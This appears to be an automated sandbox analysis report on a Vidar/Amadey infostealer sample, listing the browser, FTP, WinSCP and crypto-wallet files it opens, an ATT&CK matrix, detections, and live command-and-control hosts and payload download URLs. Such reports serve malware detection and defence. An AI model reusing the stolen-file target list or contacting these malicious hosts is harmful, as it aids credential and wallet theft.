Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected MicroClip
                        Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2472, type: MEMORYSTR
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C820C40 sqlite3_bind_zeroblob,4_2_6C820C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C820D60 sqlite3_bind_parameter_name,4_2_6C820D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C748EA0 sqlite3_clear_bindings,4_2_6C748EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C820B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,4_2_6C820B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C746410 bind,WSAGetLastError,4_2_6C746410

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		Boot or Logon Initialization Scripts511
                        Process Injection                        		11
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                        Obfuscated Files or Information                        		Security Account Manager4
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                        Software Packing                        		NTDS55
                        System Information Discovery                        		Distributed Component Object ModelInput Capture124
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp                        		LSA Secrets251
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials31
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Masquerading                        		DCSync12
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt511
                        Process Injection                        		/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528620 Sample: 7AeSqNv1rC.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 48 steamcommunity.com 2->48 50 cowod.hopto.org 2->50 58 Multi AV Scanner detection for domain / URL 2->58 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 13 other signatures 2->64 9 7AeSqNv1rC.exe 3 2->9         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\7AeSqNv1rC.exe.log, CSV 9->38 dropped 66 Writes to foreign memory regions 9->66 68 Allocates memory in foreign processes 9->68 70 Injects a PE file into a foreign processes 9->70 13 InstallUtil.exe 1 170 9->13         started        18 InstallUtil.exe 9->18         started        signatures6 process7 dnsIp8 52 cowod.hopto.org 45.132.206.251, 49891, 80 LIFELINK-ASRU Russian Federation 13->52 54 49.12.106.214, 443, 49742, 49743 HETZNER-ASDE Germany 13->54 56 2 other IPs or domains 13->56 40 C:\Users\user\AppData\Local\...\clip[1].exe, PE32 13->40 dropped 42 C:\ProgramData\softokn3.dll, PE32 13->42 dropped 44 C:\ProgramData\nss3.dll, PE32 13->44 dropped 46 4 other files (2 malicious) 13->46 dropped 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->72 74 Found many strings related to Crypto-Wallets (likely being stolen) 13->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->76 82 7 other signatures 13->82 20 cmd.exe 1 13->20         started        22 cmd.exe 1 13->22         started        24 cmd.exe 13->24         started        26 2 other processes 13->26 78 Contains functionality to inject code into remote processes 18->78 80 Searches for specific processes (likely to inject) 18->80 file9 signatures10 process11 process12 28 conhost.exe 20->28         started        30 timeout.exe 1 20->30         started        32 conhost.exe 22->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        7AeSqNv1rC.exe66%ReversingLabsWin32.Trojan.Amadey
                        7AeSqNv1rC.exe31%VirustotalBrowse

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe88%ReversingLabsWin32.Trojan.Amadey

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        steamcommunity.com0%VirustotalBrowse
                        cowod.hopto.org10%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                        https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                        http://www.fontbureau.com/designers0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                        http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        https://t.me/ae5ed100%URL Reputationmalware
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                        https://mozilla.org0/0%URL Reputationsafe
                        http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                        https://store.steampowered.com/points/shop/0%URL Reputationsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                        https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                        http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                        https://store.steampowered.com/about/0%URL Reputationsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                        http://www.fontbureau.com/designersG0%URL Reputationsafe
                        http://www.fontbureau.com/designers/?0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                        http://www.fontbureau.com/designers?0%URL Reputationsafe
                        https://help.steampowered.com/en/0%URL Reputationsafe
                        https://store.steampowered.com/news/0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        https://store.steampowered.com/stats/0%URL Reputationsafe
                        https://49.12.106.2147%VirustotalBrowse
                        https://steamcommunity.com/profiles/76561199780418869/badges0%VirustotalBrowse
                        https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                        http://cowod.hopto.org10%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                        https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%VirustotalBrowse
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        https://49.12.106.214/mozglue.dll6%VirustotalBrowse
                        https://49.12.106.214/7%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse
                        https://49.12.106.214/nss3.dll6%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%VirustotalBrowse
                        https://49.12.106.214/softokn3.dll6%VirustotalBrowse
                        http://185.215.113.117/inc/clip.exe20%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm0%VirustotalBrowse
                        https://49.12.106.214/freebl3.dll6%VirustotalBrowse
                        https://steamcommunity.com/w0%VirustotalBrowse
                        https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%VirustotalBrowse
                        http://185.215.113.117/16%VirustotalBrowse
                        https://steamcommunity.com/market/0%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		104.102.49.254
                        		truetrueunknown
                        cowod.hopto.org
                        		45.132.206.251
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://49.12.106.214/mozglue.dlltrueunknown
                        https://49.12.106.214/trueunknown
                        https://49.12.106.214/nss3.dlltrueunknown
                        https://49.12.106.214/softokn3.dlltrueunknown
                        http://185.215.113.117/inc/clip.exefalseunknown
                        https://49.12.106.214/freebl3.dlltrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabKFHJJD.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=KFHJJD.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                        https://community.akamai.steamstatic.InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                          		unknown
                          https://steamcommunity.com/?subsection=broadcastsInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                          http://cowod.hopto.orgInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmptrueunknown
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://cowod.hoptoGDGHCGDInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                            		unknown
                            https://49.12.106.214/softokn3.dllVInstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://store.steampowered.com/subscriber_agreement/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199780418869/badgesInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                              http://www.valvesoftware.com/legal.htmInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.com7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cThe7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://49.12.106.21476561199780418869[1].htm.4.drfalseunknown
                              http://185.215.113.117/inc/clip.exeZInstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://cowod.hopto.org_DEBUG.zip/c7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeInstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.117/nholman/Lcmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiHIIIEC.4.drfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://cowod.hopto.InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.07AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmptrueunknown
                                        http://www.galapagosdesign.com/DPlease7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://cowod.hoptoInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		unknown
